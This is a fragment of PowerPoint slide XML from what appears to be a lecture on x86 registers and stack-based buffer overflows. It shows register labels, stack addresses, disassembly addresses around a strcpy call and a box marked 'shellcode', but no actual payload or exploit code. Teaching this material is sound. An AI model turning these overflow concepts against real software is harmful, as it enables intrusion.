              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: the frame pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003531" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="3028950"/>
            <a:ext cx="3810000" cy="4000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endParaRPr lang="en-US">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003532" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="3028950"/>
            <a:ext cx="990600" cy="4000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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>ah</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003533" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="3028950"/>
            <a:ext cx="914400" cy="4000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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>al</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003534" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477001" y="2272784"/>
            <a:ext cx="505267" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003535" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7467600" y="3644384"/>
            <a:ext cx="402674" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>ax</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003536" name="AutoShape 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16210247">
            <a:off x="7600950" y="2955131"/>
            <a:ext cx="114300" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 70833"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003537" name="AutoShape 17"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="6667500" y="990600"/>
            <a:ext cx="228600" cy="3505200"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 95833"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003538" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="4800600"/>
            <a:ext cx="3810000" cy="4000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endParaRPr lang="en-US">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003539" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="4800600"/>
            <a:ext cx="1905000" cy="4000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endParaRPr lang="en-US">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003541" name="Text Box 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6461125" y="4044434"/>
            <a:ext cx="441146" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003542" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7451725" y="5416034"/>
            <a:ext cx="338554" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>si</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003543" name="AutoShape 23"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16210247">
            <a:off x="7524750" y="4726781"/>
            <a:ext cx="114300" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 70833"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003544" name="AutoShape 24"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="6591300" y="2762250"/>
            <a:ext cx="228600" cy="3505200"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 95833"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="158977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35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35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352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0352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0352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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff734</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x2</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xb7e3faf3</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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0x0</a:t>
                      </a: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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff87b</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff666</a:t>
                      </a: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220</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="80068" y="135968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0xbffff69c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1060369657"/>
              </p:ext>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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xa</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0xbffff69c</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0x0</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>8048420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80482d0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483fd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483fe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048400</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048403</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048406</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048409</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048412</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048415</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048420</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>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0xbffff698</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946820" y="338066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0xbffff65c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940826" y="3038035"/>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0xbffff660</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964404" y="25559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0xbffff666</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4765239" y="387175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3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479672" y="2001836"/>
            <a:ext cx="2831284" cy="734384"/>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shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940826" y="1857434"/>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0xbffff688</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887876980"/>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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff734</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x2</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xb7e3faf3</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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0x0</a:t>
                      </a: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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff87b</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
